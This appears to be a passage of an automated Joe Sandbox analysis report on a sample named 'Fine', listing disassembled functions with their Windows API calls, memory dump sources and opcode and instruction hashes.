                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b264e6ad98595de1d164179469e2c2d4470bbdd99318f7453529454fefb9c5f
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 03016632B353B01BC7246A34AC8AB3F67498B92734F29021AF954CB5D3DF708CA05D90
                                                                                                                                                                                                                                                                                                                            Function 001D58CB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,001D58BE,SwapMouseButtons,00000004,?), ref: 001D58EF
                                                                                                                                                                                                                                                                                                                            • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,001D58BE,SwapMouseButtons,00000004,?), ref: 001D5910
                                                                                                                                                                                                                                                                                                                            • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,001D58BE,SwapMouseButtons,00000004,?), ref: 001D5932
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                                                            • String ID: Control Panel\Mouse
                                                                                                                                                                                                                                                                                                                            • API String ID: 3677997916-824357125
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 43587605ebc2827fc46a951cfa89079a14afa7662fb0b5825dd4bb30cebb478a
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 28a5fcab4b287f2f6e03f71dd79879707820b3395177658aa5fd7aac5a79b21e
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 43587605ebc2827fc46a951cfa89079a14afa7662fb0b5825dd4bb30cebb478a
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1C117C75611618FFDB258FA4DC94EAE7BB9EF00764F10842AF801E7210E3719E419764
                                                                                                                                                                                                                                                                                                                            Function 001E2B20 Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 531COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 001E3006
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                                                            • String ID: CALL$bn#
                                                                                                                                                                                                                                                                                                                            • API String ID: 1385522511-4174318473
                                                                                                                                                                                                                                                                                                                            • Opcode ID: e62347e2cdd03d4649816dfdb67559691187efe1579cac94c32f01ecba5a96cb
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 5625b9c4b8de22dd2e39354618e48a99ddcaf2fcadaea80049c688a0c1cf7f0f
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e62347e2cdd03d4649816dfdb67559691187efe1579cac94c32f01ecba5a96cb
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1822CD70608681EFC714CF25C894A2EBBF5BF98304F24895DF59A8B3A2D771E951CB42
                                                                                                                                                                                                                                                                                                                            Function 001D3A95 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetOpenFileNameW.COMDLG32(?), ref: 0021413B
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001D55D1,?,?,00214B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 001D5871
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D3A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 001D3A76
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                                                                                                                                                                            • String ID: X$`u)
                                                                                                                                                                                                                                                                                                                            • API String ID: 779396738-3107755393
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 97d35ae225fb3998a19af8bf693a8b256aee7319c7dbde2e44cce6a7c606d57c
                                                                                                                                                                                                                                                                                                                            • Instruction ID: b5ed9844b698f3c822a8779da6299dd424b0eaf1db194e1e8ddbc6a037ab759b
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 97d35ae225fb3998a19af8bf693a8b256aee7319c7dbde2e44cce6a7c606d57c
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4421C371A102589BCF05DF98C805BEE7BF8AF59304F00801AE544F7341DBF59A898FA1
                                                                                                                                                                                                                                                                                                                            Function 001F014B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 001F09D8
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001F3614: RaiseException.KERNEL32(?,?,?,001F09FA,?,00000000,?,?,?,?,?,?,001F09FA,00000000,00299758,00000000), ref: 001F3674
                                                                                                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 001F09F5
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                                                                                                                            • String ID: Unknown exception
                                                                                                                                                                                                                                                                                                                            • API String ID: 3476068407-410509341
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 63d258a6a58ae6de025488e3e8e97ce66529edaf5d04acef857de313c3b25beb
                                                                                                                                                                                                                                                                                                                            • Instruction ID: b16c6f2e30e8ad056d38395905b3a3e36f872e54eccd8a117690712794d4fcc0
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 63d258a6a58ae6de025488e3e8e97ce66529edaf5d04acef857de313c3b25beb
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1DF0283490020CB78F01BBA8DC428BE776C5E18364B504120BB28D6493FB70EA55C5C0
                                                                                                                                                                                                                                                                                                                            Function 002589B6 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00258D52
                                                                                                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 00258D59
                                                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,?), ref: 00258F3A
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 146820519-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 79af7a9eb5ec0c356f782aecdb6d8592116d32bdf921057f3fc070ad15d66691
                                                                                                                                                                                                                                                                                                                            • Instruction ID: bdac23afecba4d190b49c49bbefc135049aa393ea7cf35c7d80b0c1af258b503
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 79af7a9eb5ec0c356f782aecdb6d8592116d32bdf921057f3fc070ad15d66691
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E3127B71A18301DFC714DF28C484B2ABBE1BF88315F14895EE8899B352DB70E949CF96
                                                                                                                                                                                                                                                                                                                            Function 00259AF3 Relevance: 4.7, APIs: 3, Instructions: 233COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: _wcslen$_strcat
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 306214811-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 001d17faa937d58a5deb311f7cba98cbd039a1c42bb120c75c0d96063aa8a364
                                                                                                                                                                                                                                                                                                                            • Instruction ID: a82a4713f922ed8e30fdb90baa5b604fa453232a6b9ffdc9dee10addfdcee854
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 001d17faa937d58a5deb311f7cba98cbd039a1c42bb120c75c0d96063aa8a364
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66A17931614506EFCB18DF18C5D1969BBB1FF59319B2084AEE80A8F392DB31E995CF84
                                                                                                                                                                                                                                                                                                                            Function 001EFCAD Relevance: 4.6, APIs: 3, Instructions: 75timewindowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D61A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 001D6299
                                                                                                                                                                                                                                                                                                                            • KillTimer.USER32(?,00000001,?,?), ref: 001EFD36
                                                                                                                                                                                                                                                                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 001EFD45
                                                                                                                                                                                                                                                                                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0022FE33
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: IconNotifyShell_Timer$Kill
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3500052701-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 871625eb415a22e59f41f41980d20468e541ab85ca9c6676e84fc7f1025caf4d
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 446a0652e3c9d7f6f09a80e3dca622a72e1d553d65db0ece3d3eb6dd0f2a6334
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 871625eb415a22e59f41f41980d20468e541ab85ca9c6676e84fc7f1025caf4d
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F731E571910354BFEB72CF64D845BEBBBFCAB02308F0044AED69997242C7B41A85CB51
                                                                                                                                                                                                                                                                                                                            Function 0020970B Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,002097BA,FF8BC369,00000000,00000002,00000000), ref: 00209744
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,002097BA,FF8BC369,00000000,00000002,00000000,?,00205ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,001F6F41), ref: 0020974E
                                                                                                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00209755
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2336955059-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 6baa211a531ad33614d016bc8b7c681a20c2e6dfe8efc477d59c0ecae9554b59
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 65afd9207785df33c5258b7a15ccc535dfdd67dc201616e392072e461ab8c0c6
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6baa211a531ad33614d016bc8b7c681a20c2e6dfe8efc477d59c0ecae9554b59
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C6012D73630219ABCB159F99EC4586E7719DB85330B244249F811D71E2EBB09D619B90
                                                                                                                                                                                                                                                                                                                            Function 001E1990 Relevance: 3.6, APIs: 2, Instructions: 643COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                                            • Opcode ID: a1a582e9204d11f7951cb9f746d6c035ac3d4ad4cfaf95d4171a04b429c30c1c
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 874442f0e2b579377d63643b7dc20f87d173995eb7081ef4cee2afabca2a58b7
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a1a582e9204d11f7951cb9f746d6c035ac3d4ad4cfaf95d4171a04b429c30c1c
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A321031A00659EFCB24DF94D885ABEB3B5FF14314F148529F816AB2A1E731EDA0CB50
                                                                                                                                                                                                                                                                                                                            Function 001EFFE0 Relevance: 3.1, APIs: 2, Instructions: 94COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CloseErrorHandleMode
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3953868439-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 0434a59d4195c201b73d7bfe85f0bb8bfd6417f82ecfbaae66b83ecf21e8fbc5
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B31D770A00109DFC71ACF58D490A79F7A5FB49380B2586A5E509CB352DB32EDC1CBC0
                                                                                                                                                                                                                                                                                                                            Function 001D396B Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 001D3A3C
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: b40d4c0bbbcaa3d29cb61037c70242538d8c298a0aec0aea46b5d54099978efd
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 8806f180ccca072bb3fdcb1299b4f59ebc281e1e20d9860b0905f9bf612549ad
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b40d4c0bbbcaa3d29cb61037c70242538d8c298a0aec0aea46b5d54099978efd
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 59319370604301DFD720DF25E888797BBE8FB5A318F00092EE5D987341E7B5A948CB52
                                                                                                                                                                                                                                                                                                                            Function 001D331B Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • IsThemeActive.UXTHEME ref: 001D333D
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D32E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 001D32FB
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D32E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 001D3312
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,001D3368,?), ref: 001D33BB
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,001D3368,?), ref: 001D33CE
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,002A2418,002A2400,?,?,?,?,?,?,001D3368,?), ref: 001D343A
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D338B: SetCurrentDirectoryW.KERNEL32(?,00000001,002A2418,?,?,?,?,?,?,?,001D3368,?), ref: 001D34BB
                                                                                                                                                                                                                                                                                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 001D3377
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
